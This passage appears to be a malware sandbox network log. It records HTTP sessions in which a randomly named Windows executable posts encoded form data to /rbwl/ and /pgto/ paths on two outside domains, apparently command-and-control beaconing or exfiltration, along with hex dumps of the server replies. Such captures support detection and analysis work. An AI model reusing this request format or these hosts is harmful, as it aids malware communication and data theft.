                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            14 | 192.168.2.4 | 49751 | 212.227.172.254 | 80 | 1668 | C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Jul 16, 2024 07:22:50.684969902 CEST | 669 | OUT | POST /rbwl/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 220
                            Cache-Control: max-age=0
                            Host: www.focusonsocials.com
                            Origin: http://www.focusonsocials.com
                            Referer: http://www.focusonsocials.com/rbwl/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 2f 46 4f 61 64 53 64 4d 58 76 50 4f 74 61 32 33 53 7a 49 54 69 52 42 32 50 57 37 42 45 62 4f 2b 6a 44 6b 72 61 61 4e 75 65 47 76 64 2b 6f 61 76 33 6f 33 49 73 42 55 63 56 6e 56 43 53 52 47 64 59 79 65 68 49 6a 32 43 64 4d 62 37 7a 31 62 57 6d 35 36 62 64 78 62 46 44 4b 36 32 65 2f 2b 46 38 43 6b 78 5a 77 48 67 47 30 50 30 48 73 57 68 4b 32 57 66 32 44 2f 45 34 52 33 45 64 34 4a 75 64 57 74 69 47 62 47 7a 62 6e 34 77 49 67 31 57 5a 37 56 43 63 44 6c 6b 71 34 56 75 36 39 37 32 32 53 4e 53 52 66 50 77 77 6a 63 4a 32 4b 4b 7a 34 6c 2b 70 73 54 79 62 61 63 34 4d 43 65 56 57 51 68 46 35 6a 64 5a 4d 4e 48 6e 33 6a 44 6a 45 79 57 50 46 71 4d 30 3d
                            Data Ascii: UbV=/FOadSdMXvPOta23SzITiRB2PW7BEbO+jDkraaNueGvd+oav3o3IsBUcVnVCSRGdYyehIj2CdMb7z1bWm56bdxbFDK62e/+F8CkxZwHgG0P0HsWhK2Wf2D/E4R3Ed4JudWtiGbGzbn4wIg1WZ7VCcDlkq4Vu69722SNSRfPwwjcJ2KKz4l+psTybac4MCeVWQhF5jdZMNHn3jDjEyWPFqM0=
                            Jul 16, 2024 07:22:51.327538967 CEST | 430 | IN | HTTP/1.1 301 Moved Permanently
                            Server: nginx
                            Date: Tue, 16 Jul 2024 05:22:51 GMT
                            Content-Type: text/html
                            Content-Length: 162
                            Connection: close
                            Location: https://www.focusonsocials.com/rbwl/
                            Expires: Tue, 16 Jul 2024 05:42:51 GMT
                            Cache-Control: max-age=1200
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            15 | 192.168.2.4 | 49752 | 212.227.172.254 | 80 | 1668 | C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Jul 16, 2024 07:22:53.221884966 CEST | 10751 | OUT | POST /rbwl/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 10300
                            Cache-Control: max-age=0
                            Host: www.focusonsocials.com
                            Origin: http://www.focusonsocials.com
                            Referer: http://www.focusonsocials.com/rbwl/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 2f 46 4f 61 64 53 64 4d 58 76 50 4f 74 61 32 33 53 7a 49 54 69 52 42 32 50 57 37 42 45 62 4f 2b 6a 44 6b 72 61 61 4e 75 65 47 6e 64 2b 62 69 76 32 4c 76 49 39 78 55 63 4c 33 56 35 53 52 48 50 59 79 6d 39 49 6a 36 53 64 4a 58 37 7a 57 54 57 67 49 36 62 45 68 62 46 66 36 36 4e 51 66 2b 71 38 43 30 31 5a 77 58 67 47 30 50 30 48 70 61 68 4a 6b 2b 66 30 44 2f 48 2f 52 33 41 5a 34 4a 4b 64 57 30 5a 47 62 79 4e 62 55 77 77 4c 41 6c 57 61 4a 74 43 51 44 6c 69 72 34 56 32 36 39 48 58 32 53 42 30 52 66 4b 56 77 6b 30 4a 30 4e 4c 48 68 32 76 2b 36 77 7a 64 5a 39 67 5a 44 4d 52 6d 52 47 64 66 6b 66 42 53 4e 56 6e 75 67 6b 57 68 33 6e 65 50 7a 35 34 76 57 71 35 58 78 76 41 78 57 44 7a 44 64 2b 71 6b 34 37 68 6c 54 79 6a 54 30 63 4d 31 70 38 33 69 33 61 6f 31 4b 66 47 48 36 45 71 31 76 53 45 44 4a 34 65 74 5a 37 34 6a 4e 38 4d 78 43 37 62 64 47 61 6f 4c 46 68 57 34 64 49 6f 76 54 4f 37 77 63 2b 79 62 4e 57 58 69 65 2b 4a 36 65 64 5a 7a 64 73 34 4b 7a 34 38 44 52 44 34 38 61 4d 65 4c 48 65 43 62 77 79 [TRUNCATED]
                            Data Ascii: UbV= [TRUNCATED]
                            Jul 16, 2024 07:22:53.857085943 CEST | 430 | IN | HTTP/1.1 301 Moved Permanently
                            Server: nginx
                            Date: Tue, 16 Jul 2024 05:22:53 GMT
                            Content-Type: text/html
                            Content-Length: 162
                            Connection: close
                            Location: https://www.focusonsocials.com/rbwl/
                            Expires: Tue, 16 Jul 2024 05:42:53 GMT
                            Cache-Control: max-age=1200
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            16 | 192.168.2.4 | 49753 | 212.227.172.254 | 80 | 1668 | C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Jul 16, 2024 07:22:55.764309883 CEST | 372 | OUT | GET /rbwl/?UbV=yHm6enFIYs/ovpirZiNA1kNGPi3kBJu5kTNDWZFxfmq4+4eFgr/++B8wLRVxCj6ZcFesL3DTSsX/73fVlamlaT/sJduaX9mgiTgnUifyDkvpJfWGHGD/zyQ=&Y4gp=mlltcrRxcL HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Connection: close
                            Host: www.focusonsocials.com
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Jul 16, 2024 07:22:56.388250113 CEST | 571 | IN | HTTP/1.1 301 Moved Permanently
                            Server: nginx
                            Date: Tue, 16 Jul 2024 05:22:56 GMT
                            Content-Type: text/html
                            Content-Length: 162
                            Connection: close
                            Location: https://www.focusonsocials.com/rbwl/?UbV=yHm6enFIYs/ovpirZiNA1kNGPi3kBJu5kTNDWZFxfmq4+4eFgr/++B8wLRVxCj6ZcFesL3DTSsX/73fVlamlaT/sJduaX9mgiTgnUifyDkvpJfWGHGD/zyQ=&Y4gp=mlltcrRxcL
                            Expires: Tue, 16 Jul 2024 05:42:56 GMT
                            Cache-Control: max-age=1200
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            17 | 192.168.2.4 | 49754 | 43.157.128.107 | 80 | 1668 | C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Jul 16, 2024 07:23:02.071733952 CEST | 634 | OUT | POST /pgto/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 200
                            Cache-Control: max-age=0
                            Host: www.onlandtoy.com
                            Origin: http://www.onlandtoy.com
                            Referer: http://www.onlandtoy.com/pgto/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 4a 35 49 70 54 63 62 30 4c 6e 65 38 55 64 59 37 71 63 42 72 4a 76 33 72 7a 6e 55 72 6a 32 6a 2b 35 4d 37 75 32 35 5a 4c 5a 70 6b 48 68 69 48 6e 35 42 42 73 63 49 50 63 6b 39 55 78 4b 44 75 63 30 34 53 2f 56 69 72 36 73 32 77 76 42 61 77 65 67 76 54 6b 6a 49 59 4a 4f 2f 59 74 48 65 52 34 6f 4f 43 4e 69 44 6e 32 79 31 4e 77 35 63 61 45 2b 6a 31 6f 62 32 65 72 32 4d 48 45 61 6c 72 53 64 4e 59 39 64 51 71 7a 78 6f 46 31 6f 4f 79 75 46 72 41 68 77 41 61 56 4c 51 67 73 57 65 56 6c 78 79 6e 49 62 54 33 74 52 55 4f 52 63 71 45 47 35 7a 71 6a 39 74 49 63 74 75 69 47 45 6d 48 66 49 67 3d 3d
                            Data Ascii: UbV=J5IpTcb0Lne8UdY7qcBrJv3rznUrj2j+5M7u25ZLZpkHhiHn5BBscIPck9UxKDuc04S/Vir6s2wvBawegvTkjIYJO/YtHeR4oOCNiDn2y1Nw5caE+j1ob2er2MHEalrSdNY9dQqzxoF1oOyuFrAhwAaVLQgsWeVlxynIbT3tRUORcqEG5zqj9tIctuiGEmHfIg==
                            Jul 16, 2024 07:23:03.163319111 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Tue, 16 Jul 2024 05:23:03 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Vary: Accept-Encoding
                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                            Cache-Control: no-cache, must-revalidate, max-age=0
                            Link: <http://www.onlandtoy.com/wp-json/>; rel="https://api.w.org/"
                            Content-Encoding: gzip
                            Data Raw: 33 33 39 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 7d 7b 93 23 c9 71 df df bb 9f a2 17 1b dc 01 ee f0 6a bc 66 06 b3 18 ea 6e ef 4e 3c 9b a7 63 70 ef 28 cb b7 17 1b 0d 74 63 d0 b7 00 1a ec 6e cc ec dc 70 22 24 85 64 93 96 64 cb 96 65 3b 64 32 6c 32 68 8b 21 85 48 86 65 85 64 5a a2 3e 8c ef b1 fc cb 5f c1 bf cc aa ee ae ee ae 06 1a 98 b9 3b 8b a1 7d 60 06 dd 55 99 59 59 59 59 99 59 59 55 0f ef bd f6 f6 a3 77 7e e3 6b af 1b b3 70 31 3f bd fb 90 7e 18 73 6b 79 36 aa 7c 38 6b 3c fa b5 0a 3d 73 2c fb f4 ee 9d 87 0b 27 b4 8c c9 cc f2 03 27 1c 55 de 7d e7 8d c6 51 c5 68 c5 6f 96 d6 c2 19 55 ce 5d e7 62 e5 f9 61 c5 98 78 cb d0 59 a2 e4 85 6b 87 b3 91 ed 9c bb 13 a7 c1 5f ea 86 bb 74 43 d7 9a 37 82 89 35 77 46 26 c3 11 08 18 cc 81 ef 8d bd 30 38 88 81 1c 2c ac e7 0d 77 61 9d 39 8d 95 0f 48 ce c5 70 6e f9 67 ce 01 57 0c dd 70 ee 9c 7e f2 dd 3f fb e4 3b 3f ff f8 db 3f fd c5 f7 ff ea 17 df fb 81 f1 e0 fe 51 c7 34 4f 8c 0b cf b7 51 29 08 1e b6 44 c1 bb 0f e7 ee f2 99 e1 3b f3 d1 81 bd 0c 08 e2 d4 09 27 b3 03 63 [TRUNCATED]
                            Data Ascii: 339a}{#qjfnN<cp(tcnp"$dde;d2l2h!HedZ>_;}`UYYYYYYUw~kp1?~sky6|8k<=s,''U}QhoU]baxYk_tC75wF&08,wa9HpngWp~?;??Q4OQ)D;'cFE[v]6'BUyK+t*FxBjN-?^~D|kxqVjAPKpG@%$*<{.mb,NW8&=iqOZwo'V^q\-%8?*24|]o[2@HiL?r2_D\9r]6?|ATO^g3sc?u5m{o^NHpn}Y:|u$znLN*/]8+c8Az.XKxkskvVk'd71|D^<~Ae5]_WU MLj<<3=5<@3!k'D2v^}4@Ihn(X#%T-jj'6e
                            Jul 16, 2024 07:23:03.163382053 CEST | 224 | IN | Data Raw: 35 ee 57 b0 af 76 25 5f 3a a3 d1 c8 7f 2f 7c ff ba 96 30 78 1d 31 38 b8 70 89 fd 28 3d 81 44 55 a6 73 eb ac 32 94 15 97 28 54 79 b2 b6 8f ba 13 7c 4e a7 dd 27 eb a9 d3 9e 3e 59 77 da 6d 1b 9f 03 eb 50 3c 81 80 17 14 1b a7 8a d5 be 7c cf 1c de 4b
                            Data Ascii: 5Wv%_:/|0x18p(=DUs2(Ty|N'>YwmP<|KV\vUPD@jd@L=@S{GN-X^y'@ytu@JKq{Zq^%3i4(QepoD75~95<V
                            Jul 16, 2024 07:23:03.163415909 CEST | 1236 | IN | Data Raw: 07 81 33 9f 62 fa c4 78 5f 4e b4 45 be 4c f2 fc f6 74 0a 55 ed 38 cb 47 3c 40 ab dd 76 bb 6e f6 db b5 a1 db c4 63 28 88 d7 e7 0e 29 f7 6a 45 8c e0 4a ad 6e 8d 7c 1a 86 8f 68 da c6 80 ad 74 ec 4a fd ea 02 e3 f7 eb 98 ff df f0 9d 6f ae 51 7e 7e 39
                            Data Ascii: 3bx_NELtU8G<@vnc()jEJn|htJoQ~~9QjRW$NBoU[)*vvVW|Lt('v?V!BRGBq:+ldn,&ffgi?sZz:=6{bDbz)Uq01K
                            Jul 16, 2024 07:23:03.163578987 CEST | 1236 | IN | Data Raw: 78 8f 5b f0 d2 e8 02 1a 85 a8 5e 78 b6 f3 fe f0 02 1a c6 a9 46 ef 60 4c 87 88 a7 cd 1b 73 ff fd 5a 3d 0f 87 15 ca 4e 80 fc 39 01 12 1c b8 39 41 39 38 fb 12 24 3a e0 e6 04 e5 e0 ec 4b 90 e8 ff 9b 13 94 83 b3 2f 41 42 fc 6e 4e 50 0e ce be 04 09 e9
                            Data Ascii: x[^xF`LsZ=N99A98$:K/ABnNP9A98t{!lywbKnl8v`L;XD<a6atG>b^:1esS7&k2D+3}+ALymzGvxo9O~00cbsy=
                            Jul 16, 2024 07:23:03.163615942 CEST | 1236 | IN | Data Raw: 15 02 89 34 bb 32 45 b7 d7 fc ad d3 a3 c2 74 03 ca 3e 3f ea 95 58 b4 96 99 a9 49 52 fa 09 e4 24 24 90 de a3 cc 12 11 9f 1e b1 fc bd 9f 03 94 1f 69 c2 6a 29 9a 32 32 a3 5c d8 c0 0c 7b 4b 38 58 0d de 92 e5 57 10 6f 2e 13 f2 7c fa 54 cc e4 91 8a 11
                            Data Ascii: 42Et>?XIR$$ij)22\{K8XWo.|T!Y6d[A}yP[,M6Rn#yidM;'j4L&0e"-A#rdyHpk?X0~>>':'D/MX~s>f;i?yGv"fp5
                            Jul 16, 2024 07:23:03.163650990 CEST | 1236 | IN | Data Raw: 68 bb 02 8d c3 35 6a 29 11 bf b9 0f eb 8b d4 b1 fb a1 35 c6 10 84 93 89 4d 56 8d 40 a4 c9 65 e2 22 6a 9e 24 ef 59 42 5a 29 c5 c9 39 5d af 21 52 da 5c c8 3f d3 93 cd 84 53 cd cd 6c 05 69 58 66 ab 44 d6 65 b6 b8 68 4a b6 34 23 60 5b 32 5b 9e d7 ec
                            Data Ascii: h5j)5MV@e"j$YBZ)9]!R\?SliXfDehJ4#`[2[c2GXuS:K0B'$}`76+k'y!OBa#E.{&DG5E:eh.2tmH)*VWuTI%s"c$Y)<Q3yzji\GFKKx
                            Jul 16, 2024 07:23:03.164231062 CEST | 896 | IN | Data Raw: 85 79 c3 e3 27 16 0b 8e a6 14 cd ec b1 54 1c 6d 06 2c a5 62 0f c0 c7 9b 01 4b a9 d8 03 30 96 8d 36 f7 9e 10 8b 7d 20 6f 19 7b af 0a b9 d8 07 f2 96 c1 27 05 63 1b 64 25 92 ca 7b 3f 28 d7 e7 98 52 7d d2 dd ac 14 a3 4c 18 9a ad 4d ec 9b d8 58 90 23
                            Data Ascii: y'Tm,bK06} o{'cd%{?(R}LMX#CbU5][G5xV#jKppX2G:+kE\9Z xU,aHvX|jaY'&UFhD|}7rsJr7xddp{0bC17u-kK4ul
                            Jul 16, 2024 07:23:03.164268017 CEST | 1236 | IN | Data Raw: 21 bb de 6d 88 37 19 60 bc f4 19 c9 bc a4 50 3c 53 d3 57 15 fd 4b cc 7f 29 51 05 32 0d 4c 64 dd 63 37 29 59 11 11 38 f1 0e 4b ec b0 d1 d1 64 25 1d 36 03 4f 6e 99 9e d0 91 85 ea ef 05 68 b6 00 c3 c2 19 16 2a 19 56 f2 6b 16 54 4c 95 9c c1 84 f7 20
                            Data Ascii: !m7`P<SWK)Q2Ldc7)Y8Kd%6Onh*VkTL U )t7)|z4n\`qpih[a%B6MTgADYFY*Eb)X'!&ED),58+Z)"IDM/5
                            Jul 16, 2024 07:23:03.164303064 CEST | 1236 | IN | Data Raw: 59 83 47 c3 19 69 a3 ec 01 bc 84 6d b2 07 d4 92 36 c9 1e 90 f7 b0 45 f6 c0 72 33 1b e4 e6 08 cb db 1e fb e0 da c7 e6 d8 03 cf 1e b6 c6 1e 58 76 b7 31 f6 40 b2 ab 6d b1 37 8a cd b1 02 55 1b 45 67 c9 6e 0d 16 6e 8c 1c ec 0b 51 3b bf c4 13 e7 3e 50
                            Data Ascii: YGim6Er3Xv1@m7UEgnnQ;>PK{p6&K'}-e+AsaoKln1REf&dm9Li(S]CM7+T]o;k#tM)LM454~#JP~#:5;o6'+C|(J
                            Jul 16, 2024 07:23:03.164395094 CEST | 1236 | IN | Data Raw: cb a0 cd 1e 3c 12 5d b4 21 54 f3 96 0e ec 96 68 7c 37 77 27 47 72 59 48 29 24 bd 12 48 7a 39 24 c4 db f8 5a 90 52 78 06 25 f0 0c 6e 7d 0c 94 c2 5a 86 b2 32 65 36 8d 81 0d e2 89 a3 8d f7 1d 1e 87 25 c8 3a 14 5b f8 6d 97 2e 5f a1 5b c3 60 c1 e3 3a
                            Data Ascii: <]!Th|7w'GrYH)$Hz9$ZRx%n}Z2e6%:[m._[`:F-26P<anBcV`BqKtQ;'__v/RS86o{Mb8hn?`$>GN3Qz,_hE=t)"#D,&t:
                            Jul 16, 2024 07:23:03.168534994 CEST | 1236 | IN | Data Raw: 0e b3 67 54 51 8f d9 e2 23 e6 33 e7 69 d1 33 b4 e5 ce dd 3b a5 9a 03 92 a4 fe 89 ae 2a 16 d6 0a 2f 58 c5 71 40 85 72 f2 58 88 e4 2d 11 4e ee 28 7d b3 08 02 51 08 12 37 d1 98 30 ab 24 ca 4e 09 94 77 c8 90 26 c4 65 31 7b 17 25 1a 6b 6e c2 ec 5d 70
                            Data Ascii: gTQ#3i3;*/Xq@rX-N(}Q70$Nw&e1{%kn]pcq$Rjm19a8{0|Z--1>q/Bww(y$bz>Fj^HK@&&Q6d3oV[KQzZeV\fZtbb`(bSURLptpU!wkMo


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            18 | 192.168.2.4 | 49755 | 43.157.128.107 | 80 | 1668 | C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Jul 16, 2024 07:23:04.604759932 CEST | 654 | OUT | POST /pgto/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 220
                            Cache-Control: max-age=0
                            Host: www.onlandtoy.com
                            Origin: http://www.onlandtoy.com
                            Referer: http://www.onlandtoy.com/pgto/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 4a 35 49 70 54 63 62 30 4c 6e 65 38 55 39 6f 37 6f 2f 70 72 59 66 32 5a 74 58 55 72 34 6d 6a 79 35 4d 6e 75 32 38 67 51 5a 62 41 48 68 43 58 6e 72 54 35 73 66 49 50 63 73 64 55 30 4f 44 75 68 30 34 65 33 56 6d 72 36 73 32 6b 76 42 65 34 65 67 59 2f 6e 69 59 59 4c 53 2f 59 76 61 75 52 34 6f 4f 43 4e 69 44 7a 59 79 31 56 77 35 73 71 45 2f 48 5a 33 57 57 65 6f 31 4d 48 45 4c 31 71 56 64 4e 59 54 64 52 33 6d 78 72 39 31 6f 4f 43 75 46 36 41 69 35 41 61 4d 50 51 67 69 48 4c 34 55 33 51 71 70 53 78 33 61 66 58 71 44 64 73 56 63 6f 43 4c 30 76 74 73 76 77 70 72 79 4a 6c 36 57 54 76 36 70 78 32 45 2b 2b 65 33 58 57 67 4a 5a 79 78 44 30 61 37 4d 3d
                            Data Ascii: UbV=J5IpTcb0Lne8U9o7o/prYf2ZtXUr4mjy5Mnu28gQZbAHhCXnrT5sfIPcsdU0ODuh04e3Vmr6s2kvBe4egY/niYYLS/YvauR4oOCNiDzYy1Vw5sqE/HZ3WWeo1MHEL1qVdNYTdR3mxr91oOCuF6Ai5AaMPQgiHL4U3QqpSx3afXqDdsVcoCL0vtsvwpryJl6WTv6px2E++e3XWgJZyxD0a7M=
                            Jul 16, 2024 07:23:05.706542015 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Tue, 16 Jul 2024 05:23:05 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Vary: Accept-Encoding
                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                            Cache-Control: no-cache, must-revalidate, max-age=0
                            Link: <http://www.onlandtoy.com/wp-json/>; rel="https://api.w.org/"
                            Content-Encoding: gzip
                            Data Raw: 33 33 39 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 7d 7b 93 23 c9 71 df df bb 9f a2 17 1b dc 01 ee f0 6a bc 66 06 b3 18 ea 6e ef 4e 3c 9b a7 63 70 ef 28 cb b7 17 1b 0d 74 63 d0 b7 00 1a ec 6e cc ec dc 70 22 24 85 64 93 96 64 cb 96 65 3b 64 32 6c 32 68 8b 21 85 48 86 65 85 64 5a a2 3e 8c ef b1 fc cb 5f c1 bf cc aa ee ae ee ae 06 1a 98 b9 3b 8b a1 7d 60 06 dd 55 99 59 59 59 59 99 59 59 55 0f ef bd f6 f6 a3 77 7e e3 6b af 1b b3 70 31 3f bd fb 90 7e 18 73 6b 79 36 aa 7c 38 6b 3c fa b5 0a 3d 73 2c fb f4 ee 9d 87 0b 27 b4 8c c9 cc f2 03 27 1c 55 de 7d e7 8d c6 51 c5 68 c5 6f 96 d6 c2 19 55 ce 5d e7 62 e5 f9 61 c5 98 78 cb d0 59 a2 e4 85 6b 87 b3 91 ed 9c bb 13 a7 c1 5f ea 86 bb 74 43 d7 9a 37 82 89 35 77 46 26 c3 11 08 18 cc 81 ef 8d bd 30 38 88 81 1c 2c ac e7 0d 77 61 9d 39 8d 95 0f 48 ce c5 70 6e f9 67 ce 01 57 0c dd 70 ee 9c 7e f2 dd 3f fb e4 3b 3f ff f8 db 3f fd c5 f7 ff ea 17 df fb 81 f1 e0 fe 51 c7 34 4f 8c 0b cf b7 51 29 08 1e b6 44 c1 bb 0f e7 ee f2 99 e1 3b f3 d1 81 bd 0c 08 e2 d4 09 27 b3 03 63 [TRUNCATED]
                            Data Ascii: 339a}{#qjfnN<cp(tcnp"$dde;d2l2h!HedZ>_;}`UYYYYYYUw~kp1?~sky6|8k<=s,''U}QhoU]baxYk_tC75wF&08,wa9HpngWp~?;??Q4OQ)D;'cFE[v]6'BUyK+t*FxBjN-?^~D|kxqVjAPKpG@%$*<{.mb,NW8&=iqOZwo'V^q\-%8?*24|]o[2@HiL?r2_D\9r]6?|ATO^g3sc?u5m{o^NHpn}Y:|u$znLN*/]8+c8Az.XKxkskvVk'd71|D^<~Ae5]_WU MLj<<3=5<@3!k'D2v^}4@Ihn(X#%T-jj'6e
                            Jul 16, 2024 07:23:05.706624031 CEST | 1236 | IN | Data Raw: 35 ee 57 b0 af 76 25 5f 3a a3 d1 c8 7f 2f 7c ff ba 96 30 78 1d 31 38 b8 70 89 fd 28 3d 81 44 55 a6 73 eb ac 32 94 15 97 28 54 79 b2 b6 8f ba 13 7c 4e a7 dd 27 eb a9 d3 9e 3e 59 77 da 6d 1b 9f 03 eb 50 3c 81 80 17 14 1b a7 8a d5 be 7c cf 1c de 4b
                            Data Ascii: 5Wv%_:/|0x18p(=DUs2(Ty|N'>YwmP<|KV\vUPD@jd@L=@S{GN-X^y'@ytu@JKq{Zq^%3i4(QepoD75~95<V3bx_NELt
                            Jul 16, 2024 07:23:05.706666946 CEST | 448 | IN | Data Raw: b3 7f 11 e8 a5 75 ee 9e 71 94 c1 48 3a 2e ae 75 c5 6c 6d 40 c4 17 c1 10 03 b9 da 68 24 15 1a 90 48 6f 2d 59 5f 97 01 98 da 09 e9 0e 22 78 69 37 52 0c 38 89 84 78 3a 77 9e 9f d0 47 c3 76 7d cc 7b c0 5d 08 3b 2e 91 c0 e7 9a 17 be b5 2a ac 44 2f eb
                            Data Ascii: uqH:.ulm@h$Ho-Y_"xi7R8x:wGv}{];.*D/Q;`DA<Ud"BZ)\ \5Z8r'<H+,>*(!@AJ]kt=/PI'Cz*-539F{=sO'W+(f,N{dfx[^x
                            Jul 16, 2024 07:23:05.706700087 CEST | 1236 | IN | Data Raw: 8e 39 a0 4f 7e 30 30 e8 63 86 62 bd 73 b3 79 d8 3d fc 8a d9 6d 76 50 e1 b0 6d e2 15 3e 1b 54 34 2a 7f d8 eb a0 16 3e bf d1 31 67 78 83 0a e7 0d 54 3e ee cd e9 f9 21 55 39 e4 1a f4 61 f2 f7 1e 21 42 95 af 34 8f 50 ef b8 79 7c 04 74 e6 a0 c3 35 00
